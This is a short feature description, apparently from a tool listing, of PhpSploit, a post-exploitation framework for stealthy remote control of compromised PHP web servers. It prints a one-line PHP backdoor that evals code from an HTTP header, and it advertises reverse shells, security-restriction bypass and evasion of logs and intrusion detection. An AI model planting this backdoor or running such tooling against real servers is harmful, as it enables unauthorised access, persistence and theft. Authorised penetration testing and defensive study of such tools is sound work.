Phpsploit - Stealth Post-Exploitation Framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalationpurposes.


The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tinypolymorphic backdoor :
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>


  • Efficient : More than 20 plugins to automate post-exploitation tasks 
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth : The framework is made by paranoids, for paranoids 
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated tobypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient : A robust interface with many crucial features 
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature, with persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has apolymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms

  • GNU/Linux
  • Mac OS X
  • Windows (experimental)